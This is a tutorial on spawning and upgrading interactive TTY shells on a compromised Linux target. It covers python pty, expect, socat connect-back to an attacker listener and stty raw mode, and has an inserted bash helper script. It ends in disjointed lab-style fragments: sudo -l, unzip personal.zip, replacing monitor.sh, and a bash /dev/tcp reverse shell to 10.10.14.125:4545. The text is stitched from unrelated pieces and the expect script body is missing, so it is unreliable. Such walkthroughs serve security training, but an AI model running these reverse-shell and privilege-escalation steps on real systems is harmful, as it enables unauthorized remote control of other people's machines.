Spawning a tty shell
This is the most popular method of spawning a tty shell. It requires the target server to have python (or python3) installed. Keep in mind to spawn
python -c "import pty;pty.spawn('/bin/bash')"
Not all servers have expect installed by default; however, if you are lucky enough to find it, you can use the following to spawn a tty shell.
$ expect -v
expect version 5.45.4
$ cat > /tmp/shell.sh <<EOF
$ chmod u+x /tmp/shell.sh
Socat is like netcat on steroids: a very powerful networking swiss-army knife. Socat can pass a full TTY over a TCP connection.
Again, not every server has socat installed (it is not installed by default). You can compile the binary yourself or download a static socat binary and upload it to the target.
On the attacker machine, set up the socat listener; replace 4444 with your listening port.
socat -,raw,echo=0 tcp-listen:4444
On the victim machine, connect back to the attacker machine and spawn a shell. Replace <host> with the attacker IP and <port> with the attacker's listening port.
$ socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp:<host>:<port>
To check whether the shell is a tty shell, simply run the tty command: it prints the terminal device (for example /dev/pts/0) when you have a tty and "not a tty" otherwise.
Once you manage to upgrade to a tty shell, you still have a limited shell (not fully interactive): tab-completion and arrow keys will not work, because your local terminal is still in cooked mode and interprets those keys itself. This is frustrating, and it is also risky: if a command hangs, ctrl+c is delivered to your local netcat or socat process and kills the whole session instead of the remote command. Follow my next tutorial here on how to upgrade the shell to a fully interactive shell.
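The spawn, check and upgrade steps described above (and sketched further down as bash -i, ctrl+z, stty raw -echo) collected into shell helpers, as an added example that is not code from the original page. It assumes a Linux target with GNU coreutils; the interpreter names it probes for (python3, python, script, expect) are the usual ones and are only looked up, never assumed to be present, and the fake probe functions mentioned in the comments are illustrative.

```shell
#!/usr/bin/env bash
# Added example, not code from the original page: helpers for the
# spawn -> check -> upgrade procedure described above. Assumes a Linux
# target with GNU coreutils. Everything is a function; nothing runs on load.

# The check the page describes. `tty` prints the device (e.g. /dev/pts/0)
# when stdin is a terminal and "not a tty" otherwise; [ -t 0 ] is the same
# test built into the shell, so it works even where `tty` is missing.
is_tty_shell() {
  [ -t 0 ] && [ -t 1 ]
}

# Probe for a binary on the box this runs on (i.e. the target).
have_bin() {
  command -v "$1" >/dev/null 2>&1
}

# Pick the first available spawner and print the command to run. The probe
# is a parameter (default: have_bin) so the selection can be exercised with
# a fake probe such as `only_python3() { [ "$1" = python3 ]; }`.
spawn_cmd() {
  local have="${1:-have_bin}"
  if "$have" python3; then
    echo "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
  elif "$have" python; then
    echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
  elif "$have" script; then
    echo "script -qc /bin/bash /dev/null"
  elif "$have" expect; then
    echo "expect -c 'spawn /bin/bash; interact'"
  else
    return 1
  fi
}

# After Ctrl-Z on the attacker side, `stty raw -echo; fg` puts the local
# terminal in raw mode so ^C, ^Z, tab and arrows reach the remote pty. The
# remote pty still has a bogus window size, so turn the attacker's
# `stty size` output ("ROWS COLS") into the fix-up line to paste into the
# target. Rejects anything that is not exactly two non-negative integers.
build_fixup() {
  set -- $1
  [ "$#" -eq 2 ] || return 1
  case "$1$2" in ''|*[!0-9]*) return 1 ;; esac
  printf 'reset; export TERM=xterm; stty rows %s cols %s\n' "$1" "$2"
}

# Attacker-side walkthrough (typed by hand, in this order):
#   1. in the dumb reverse shell, on the target:  run the line spawn_cmd prints
#   2. verify on the target:                      tty   -> /dev/pts/N
#   3. locally:                                   Ctrl-Z, then  stty raw -echo; fg
#   4. locally:  build_fixup "$(stty size)"      -> paste its output into the target
```

The reason the fix-up line matters: without the rows/cols the remote pty believes it is 0x0 or 80x24, so full-screen programs (vi, less, sudoedit) redraw incorrectly even though the shell is otherwise fully interactive.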
bash -i works, but tab autocomplete does not work.
Press ctrl+z to background it.
Running sudo -l got me to the personal zip folder.
Unzip it by typing "unzip personal.zip"
I went to the directory and checked monitor.sh.
stty raw -echo
Maybe if we replace it with a different bash script, we can get a reverse shell?
bash -i >& /dev/tcp/10.10.14.125/4545 0>&1